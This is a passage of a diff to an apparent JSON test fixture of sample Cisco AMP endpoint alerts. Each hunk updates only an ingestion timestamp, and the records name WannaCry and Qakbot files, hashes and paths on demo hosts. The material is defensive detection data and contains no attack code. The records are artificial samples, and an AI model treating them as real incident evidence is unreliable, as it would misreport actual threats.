Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419229322845880359\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "code": "553648143", "kind": "alert", @@ -1071,7 +1071,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:51.461526200Z", + "ingested": "2021-12-14T14:40:57.457046609Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229327140848000,\"timestamp\":1610635264,\"timestamp_nanoseconds\":870000000,\"date\":\"2021-01-14T14:41:04+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229327140847671\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "1090519054", "kind": "alert", @@ -1170,7 +1170,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:51.461531900Z", + "ingested": "2021-12-14T14:40:57.457047145Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229327140848000,\"timestamp\":1610635264,\"timestamp_nanoseconds\":698000000,\"date\":\"2021-01-14T14:41:04+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419229327140847666\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"},\"parent\":{\"process_id\":5748,\"disposition\":\"Clean\",\"file_name\":\"cmd.exe\",\"identity\":{\"sha256\":\"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae\",\"sha1\":\"ee8cbf12d87c4d388f09b4f69bed2e91682920b5\",\"md5\":\"ad7b9c14083b52bc532fba5948342b98\"}}}}}", "code": "1090519054", "kind": "alert", @@ -1271,7 +1271,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:51.461537700Z", + "ingested": "2021-12-14T14:40:57.457047649Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229327140848000,\"timestamp\":1610635264,\"timestamp_nanoseconds\":667000000,\"date\":\"2021-01-14T14:41:04+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419229327140847665\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"},\"parent\":{\"process_id\":4772,\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}}", "code": "1090519054", "kind": "alert", @@ -1370,7 +1370,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:51.461543700Z", + "ingested": "2021-12-14T14:40:57.457048119Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229327140848000,\"timestamp\":1610635264,\"timestamp_nanoseconds\":28000000,\"date\":\"2021-01-14T14:41:04+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Gen.20gl.1201\",\"detection_id\":\"6419229327140847656\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"},\"parent\":{\"process_id\":708,\"disposition\":\"Clean\",\"file_name\":\"lsass.exe\",\"identity\":{\"sha256\":\"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71\",\"sha1\":\"7abcc82dc5a05b4f53fd0fbd386738e5555025cf\",\"md5\":\"4e568dbe3fff1a0025eb432dc929b78f\"}}}}}", "code": "1090519054", "kind": "alert", @@ -1473,7 +1473,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:51.461549500Z", + "ingested": "2021-12-14T14:40:57.457048481Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229322845880000,\"timestamp\":1610635263,\"timestamp_nanoseconds\":950000000,\"date\":\"2021-01-14T14:41:03+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Gen.20gl.1201\",\"detection_id\":\"6419229322845880359\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"},\"parent\":{\"process_id\":708,\"disposition\":\"Clean\",\"file_name\":\"lsass.exe\",\"identity\":{\"sha256\":\"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71\",\"sha1\":\"7abcc82dc5a05b4f53fd0fbd386738e5555025cf\",\"md5\":\"4e568dbe3fff1a0025eb432dc929b78f\"}}}}}", "code": "1090519054", "kind": "alert", @@ -1551,7 +1551,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:51.461555300Z", + "ingested": "2021-12-14T14:40:57.457048949Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411488666497057000,\"timestamp\":1610635060,\"timestamp_nanoseconds\":913000000,\"date\":\"2021-01-14T14:37:40+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6411488666497056775\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91\"}}}}", "code": "2164260893", "kind": "alert", @@ -1627,7 +1627,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:51.461561100Z", + "ingested": "2021-12-14T14:40:57.457049392Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411488666497057000,\"timestamp\":1610635060,\"timestamp_nanoseconds\":913000000,\"date\":\"2021-01-14T14:37:40+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6411488666497056774\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91\"}}}}", "code": "2164260893", "kind": "alert", @@ -1703,7 +1703,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:51.461566900Z", + "ingested": "2021-12-14T14:40:57.457049749Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411488666497057000,\"timestamp\":1610635060,\"timestamp_nanoseconds\":913000000,\"date\":\"2021-01-14T14:37:40+00:00\",\"event_type\":\"Retrospective Quarantine\",\"event_type_id\":553648155,\"detection_id\":\"6411488666497056773\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91\"}}}}", "code": "553648155", "kind": "alert", @@ -1781,7 +1781,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:51.461572500Z", + "ingested": "2021-12-14T14:40:57.457050125Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411488666497057000,\"timestamp\":1610635060,\"timestamp_nanoseconds\":398000000,\"date\":\"2021-01-14T14:37:40+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.DD6D4FEDD3-100.SBX.TG\",\"detection_id\":\"6411488666497056775\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"qYf.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\Documents\\\\qYf.exe\",\"identity\":{\"sha256\":\"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91\"}}}}", "code": "553648147", "kind": "alert", @@ -1861,7 +1861,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:51.461578400Z", + "ingested": "2021-12-14T14:40:57.457050480Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411488666497057000,\"timestamp\":1610635060,\"timestamp_nanoseconds\":398000000,\"date\":\"2021-01-14T14:37:40+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.DD6D4FEDD3-100.SBX.TG\",\"detection_id\":\"6411488666497056774\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"4191700.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\4191700.exe\",\"identity\":{\"sha256\":\"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91\"}}}}", "code": "553648147", "kind": "alert", @@ -1945,7 +1945,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:51.461584400Z", + "ingested": "2021-12-14T14:40:57.457050945Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411488666497057000,\"timestamp\":1610635060,\"timestamp_nanoseconds\":398000000,\"date\":\"2021-01-14T14:37:40+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.DD6D4FEDD3-100.SBX.TG\",\"detection_id\":\"6411488666497056773\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"MspthrdHash.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\MspthrdHash\\\\MspthrdHash.exe\",\"identity\":{\"sha256\":\"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91\",\"sha1\":\"8cf0ca99a8f5019d8583133b9a9379299c45470c\",\"md5\":\"6894b3834bd541fa85df79e44568acac\"}}}}", "code": "553648147", "kind": "alert", @@ -2026,7 +2026,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:35:51.461608Z", + "ingested": "2021-12-14T14:40:57.457051424Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1493058569636000800,\"timestamp\":1610633340,\"timestamp_nanoseconds\":636000000,\"date\":\"2021-01-14T14:09:00+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Critical\",\"start_timestamp\":1610633340,\"start_date\":\"2021-01-14T14:09:00+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"Qakbot is a worm that spreads through network shares and removable drives. It downloads additional files, steals information, and opens a back door on the compromised computer. The worm also contains rootkit functionality to allow it to hide its presence. A command or file path similar to one used by Qakbot for spreading across the network or persistence was seen.\",\"short_description\":\"W32.Qakbot.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"cmd.exe\",\"file_path\":\"/C:/Windows/SysWOW64/cmd.exe\",\"identity\":{\"sha256\":\"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae\"},\"parent\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"b9c3eea0c27244f91cce86d57aca2b3f8d09f1dbd6274751226c6b09398a7ba4\"}}}}}", "code": "1107296274", "kind": "alert", @@ -2106,7 +2106,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:51.461614400Z", + "ingested": "2021-12-14T14:40:57.457051953Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6264772016730014000,\"timestamp\":1610631960,\"timestamp_nanoseconds\":611000000,\"date\":\"2021-01-14T13:46:00+00:00\",\"event_type\":\"Retrospective Quarantine\",\"event_type_id\":553648155,\"detection_id\":\"6264772016730013699\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Low_Prev_Retro\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"df:d1:ed:2d:c8:fc\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b\"}}}}", "code": "553648155", "kind": "alert", @@ -2188,7 +2188,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:51.461636400Z", + "ingested": "2021-12-14T14:40:57.457052306Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6264772016730014000,\"timestamp\":1610631960,\"timestamp_nanoseconds\":65000000,\"date\":\"2021-01-14T13:46:00+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.D5221F6847-100.SBX.TG\",\"detection_id\":\"6264772016730013699\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Low_Prev_Retro\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"df:d1:ed:2d:c8:fc\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"report.pdf.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\rsteadman\\\\Downloads\\\\report.pdf.exe\",\"identity\":{\"sha256\":\"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b\",\"sha1\":\"5058b16a86beee96927371210b9a9f682976a50a\",\"md5\":\"48a0bf05b9706a00d2a0ff6260412f11\"}}}}", "code": "553648147", "kind": "alert", @@ -2268,7 +2268,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:51.461641200Z", + "ingested": "2021-12-14T14:40:57.457052666Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6264772012435046000,\"timestamp\":1610631959,\"timestamp_nanoseconds\":940000000,\"date\":\"2021-01-14T13:45:59+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.D5221F6847-100.SBX.TG\",\"detection_id\":\"6264772012435046402\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Low_Prev_Retro\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"df:d1:ed:2d:c8:fc\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"Unconfirmed 762952.crdownload\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\rsteadman\\\\Downloads\\\\Unconfirmed 762952.crdownload\",\"identity\":{\"sha256\":\"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b\"}}}}", "code": "553648147", "kind": "alert", @@ -2342,7 +2342,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:51.461646400Z", + "ingested": "2021-12-14T14:40:57.457053158Z", "original": 